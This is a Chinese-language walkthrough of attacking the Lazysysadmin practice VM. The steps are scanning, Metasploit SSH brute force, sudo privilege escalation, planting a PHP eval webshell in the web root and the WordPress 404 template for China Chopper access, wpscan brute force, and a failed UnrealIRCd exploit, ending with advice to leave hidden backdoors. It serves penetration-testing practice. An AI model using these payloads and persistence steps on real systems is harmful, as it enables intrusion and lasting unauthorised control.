靶机Lazysysadmin

一、实验环境

二、实验步骤

(一)信息收集

1.查询测试机IP地址,判断所处网段

2.主机发现(netdiscover)

3.端口扫描(masscan/namp)

(二)漏洞扫描

1.开启nessusd服务,加载插件,登录

2.建立扫描

3.扫描结果

(三)ssh爆破(22端口)

1.启动msf终端

2.搜索ssh_login的相关工具和攻击荷载

3.启用漏洞利用模块,并查看需要设置的相关项

4.设置目标主机的IP地址

5.设置登录用户的用户文件

6.设置暴力破解的密码文件路径

7.开始向目标主机爆破ssh的登录账号和密码

8.远程连接目标主机

9.终极三问

10.查询/etc/passwd文件权限

11.查看当前用户togie允许命令的权限信息

12.提权

13.上传后门文件(一句话木马)

14.启用中国菜刀,获取webshell权限(后门测试)

(四)http服务(80端口)

1.目标机开启apache服务,尝试web渗透

2.网站指纹信息扫描(whatweb)

3.目录扫描(dirb)

4.打开目标主机的php配置文件

5.查看防爬虫机器人文件

6.查看搭站模板文件

7.查看搭站后台

8.查看phpmyadmin后台登录界面

(五)ircd 互联网中继聊天守护进程(6667端口)

1.启动msf终端

2.搜索模块

3.启用漏洞利用模块,并查看需要设置的相关项

4.设置目标主机的IP地址

5.执行


一、实验环境

1.靶机:Lazysysadmin

2.测试机:Kali

3.帮凶机:Windows 10

4.扫描工具:Nesssus

二、实验步骤

(一)信息收集

1.查询测试机IP地址,判断所处网段

  • 测试机(Kali)所处网段为:192.168.10.0/24

2.主机发现(netdiscover)

netdiscover -i eth0 -r 192.168.10.0/24

  • 发现四台主机,分别为:192.168.10.1、192.168.10.2、192.168.10.140、192.168.10.254

  • nmap扫描时,会发现测试机本机的IP信息,而netdiscover命令则不会

3.端口扫描(masscan/namp)

masscan --rate=10000 --ports 0-65535 192.168.10.140
nmap -sV -T4 -p 6667,22,445,80,139,3306 192.168.10.140

  • masscan扫描速度快,但准确率不高,多扫描几次,防止漏扫

  • namp:-T4(分为0-5等级;-sV(版本信息与开启服务);-A(详细扫描开放的端口的具体服务)

  • 与masscan相比,namp更详细,但是速度较慢(可以先使用masscan扫描出端口,再用nmap详细扫描开放的端口)

  • 开启了6667(ircd 互联网中继聊天守护进程),22(ssh服务),139、445(smaba共享服务),80(Apache服务),3306(MySQL)端口

(二)漏洞扫描

1.开启nessusd服务,加载插件,登录

/etc/init.d/nessusd start

2.建立扫描

3.扫描结果

(三)ssh爆破(22端口)

原理:靶机用户存在弱口令漏洞,利用枚举的方法破解目标主机ssh服务(使用Metasploit)

1.启动msf终端

msfconsole

2.搜索ssh_login的相关工具和攻击荷载

search ssh_login

3.启用漏洞利用模块,并查看需要设置的相关项

use auxiliary/scanner/ssh/ssh_login
show options

4.设置目标主机的IP地址

set rhosts 192.168.10.140

5.设置登录用户的用户文件

set user_file /root/user.txt

6.设置暴力破解的密码文件路径

set pass_file /root/pass.txt

7.开始向目标主机爆破ssh的登录账号和密码

exploit

8.远程连接目标主机

ssh togie@192.168.10.140

9.终极三问

whoami———>pwd———>uname -a

10.查询/etc/passwd文件权限

ls -l /etc/passwd

  • /etc/passwd仅root拥有可读可写权限,togie只拥有可读权限

11.查看当前用户togie允许命令的权限信息

sudo -l

  • togie用户在本机上允许命令的权限为所有

  • togie用户所在组为:sudo

12.提权

sudo su root

  • 获取root权限

13.上传后门文件(一句话木马)

<?php @eval($_POST[cmd]);?>

  • 后门文件(一句话木马),可以多放几个在不同目录(必须是在/var/www/html目录下),使用不同文件名(隐藏深点)

  • 也可以使用webacoo工具自动生成一句话木马(webacoo -g -o 1.php)

14.启用中国菜刀,获取webshell权限(后门测试)

http://192.168.10.140/1.php

  • 只要后门没有被清除,都可以用菜刀为所欲为

(四)http服务(80端口)

1.目标机开启apache服务,尝试web渗透

http://192.168.10.140

  • 页面无法进行任何操作

2.网站指纹信息扫描(whatweb)

whatweb 192.168.10.140

3.目录扫描(dirb)

dirb http://192.168.10.140    #使用默认字典进行扫描
dpkg -L dirb
dirb http://192.168.10.140 /usr/share/dirb/wordlists/big.txt

  • 扫描到几个可查看利用路径

4.打开目标主机的php配置文件

http://192.168.10.140/info.php

  • 该配置文件,含有目标主机服务器的各项配置,若被攻击者拿到,风险极高

5.查看防爬虫机器人文件

http://192.168.10.140/robots.txt

  • 此文件中的路径,是不会被爬虫机器人爬虫的(证明此中路径或许隐藏重要信息)

  • 遗憾的是,并未从这些路径获取到有用信息

6.查看搭站模板文件

http://192.168.10.140/wordpress

  • 发现疑似用户名的信息(togie)

  • 猜测用户名为togie,密码为12345,并验证成功

7.查看搭站后台

http://192.168.10.140/wordpress/wp-login.php

a.使用wp-config.php中获取的账号密码,登录搭站后台

b.制作后门文件(在404页面注入一句话木马)

<?php @eval($_POST[cmd]);?>

c.输入错误路径,打开404页面

d.启用中国菜刀,获取webshell权限(后门测试)

http://192.168.10.140/wordpress/?p=658349023943294

>搭站模板漏洞扫描(wpscan)

wpscan -u http://192.168.10.140/wordpress -e vp,vt,tt#vp 只枚举有漏洞的插件,vt只枚举存在漏洞的主题,tt列举缩略图相关的文件
wpscan -u http://192.168.10.140/wordpress -e u

wpscan -u http://192.168.10.140/wordpress -U Admin -P /etc/password.txt
  • 枚举wordpress的用户,发现一个用户Admin,并尝试爆破Admin密码,未成功

8.查看phpmyadmin后台登录界面

http://192.168.10.140/phpmyadmin

  • 尝试弱口令/用户名togie密码12345,并未成功

  • 尝试使用wp-config.php中获取的账号密码,成功登录数据库

  • 虽然成功登录,但权限过低,无法查看数据库中的表

(五)ircd 互联网中继聊天守护进程(6667端口)

1.启动msf终端

msfconsole

2.搜索模块

search unreal_ircd_3281_backdoor

3.启用漏洞利用模块,并查看需要设置的相关项

use exploit/unix/irc/unreal_ircd_3281_backdoor
show options

4.设置目标主机的IP地址

set rhost 192.168.10.140

5.执行

exploit

  • 6667端口利用无果

小结 :

1.拿到一个靶机,先对其进行信息收集(接下来使用nessus扫描漏洞也不错)

2.该靶机存在弱口令漏洞,可使用ssh爆破

2.获取的shell用户账号在sudo组内,可直接使用sudo命令进行提权

3.开启共享服务(139/445端口),可利用远程挂载,查看其中隐秘配置文件

4.开启http服务(80端口),对其目录进行爆破,并逐个(也可凭经验有针对性地)访问,发现漏洞

5.记得留后门,方便以后使用

靶机渗透(一)Lazysysadmin相关推荐

  1. 【VulnHub靶机渗透】三:Billu_b0x

    VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成(万分感谢提供靶机镜像的同学). 文章目录 ...

  2. HA: SHERLOCK 靶机渗透取证

    HA: SHERLOCK 靶机渗透取证 靶机描述: DescriptionHA: Sherlock! This lab is based on the famous investigator's jo ...

  3. [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...

  4. [HTB]“Heist”靶机渗透详细思路

    今天我们来看一下hackthebox里的一个靶机"Heist",直接开始渗透. 一.信息搜集 先打开网站看看.是一个登陆框,使用弱口令和注入都无果.在网页中发现了 login as ...

  5. [网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)

    这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施.这篇文章将讲 ...

  6. 【渗透测试】靶机渗透Vulnhub-bulldog

    目录 前言 一.bulldog靶机安装 二.bulldog靶机渗透 1.信息搜集 2.Web渗透--后台登录 3.Web渗透--命令注入&nc反弹shell 4.权限提升 渗透步骤回顾 感悟 ...

  7. 靶机渗透【bulldog】

    文章目录 *一. bulldog靶机安装* 1. 下载bulldog 2. 开启bulldog *二. bulldog靶机渗透* 1. 信息收集 2. Web渗透 3. 命令注入&nc反弹sh ...

  8. Bulldog靶机渗透

    Bulldog靶机渗透 1. 获取地址IP,确定靶机IP是192.168.119.134 2.扫描目标主机信息 3.爆破目标主机目录 4.通过翻译得知这个网页是给承包商看的 5.查看网页的源码,查找有 ...

  9. 【VulnHub靶机渗透】一:BullDog2

    在网上各位大佬WriteUp的帮助下,成功完成了第一次完整的靶机渗透测试(大佬NB!),现将详细过程及原理做简单整理. 文章目录 简介 渗透步骤 1.主机发现.端口扫描 2.Web扫描.漏洞发现 3. ...

  10. bulldog2 靶机渗透

    bulldog2 靶机渗透 1.先做主机发现 2.查看目标靶机开通的服务,发现目标靶机只开通了80端口 3.使用http服务登录主页 4.发现网站关闭了注册功能 5.发现用户遍历漏洞 6.查看下载好的 ...

最新文章

  1. Android(java)学习笔记96:layout_weight使用注意事项
  2. facebook 直播_什么时候是在Facebook Live上直播的最佳时间? 我分析了5,000个Facebook帖子以找出答案。...
  3. 输入一个整数,判断是奇数还是偶数
  4. PyTorch 多分类损失函数
  5. springcloud全局过滤_微服务技术SpringCloud 互联网网站架构演变过程
  6. 课堂练习课下作业----用户场景分析
  7. 物联网大数据平台应具备的功能和特点
  8. OSTaskStkInit_FPE_x86()--浮点仿真任务栈初始化函数(分段寻址的地址转换为线性地址)
  9. java中volatile_java中volatile关键字的含义
  10. fedora15下GNOME3使用笔记
  11. 遥感导论网课_经典课程教材遥感导论.pdf
  12. ogg for bigdata hbase安装步骤
  13. 计算机主机mac地址怎么查,怎么查看电脑的Mac地址
  14. Win10桌面图标排列混乱
  15. cordova ios升级插件
  16. Excel VLOOKUP 多条件使用
  17. [4G5G专题-58]:L2 PDCP子层-分组数据汇聚控制协议架构、PDCP包格式、鲁棒性头压缩RoHC
  18. 双视图特征点匹配———使用RANSAC法剔除误差点
  19. Java GridBagLayout(网格包布局管理器)
  20. html文件无法找到,html文件无法打开

热门文章

  1. 值得收藏的 104个 CSS 面试题
  2. 快速学习-Saturn用户的认证与授权
  3. 计算机网络 性能指标 非性能指标
  4. Qt基础之二十:进程间通信
  5. html实现开心消消乐小游戏
  6. mysql修改data文件位置
  7. 5G NR 随机接入RACH流程(7)--分类和重要RACH流程总结
  8. 500G !!史上最全的JAVA全套教学视频网盘分享 (JEECG开源社区)
  9. 去字节面试,直接让人出门左拐:Bean 生命周期都不知道!
  10. clumsy 弱网测试工具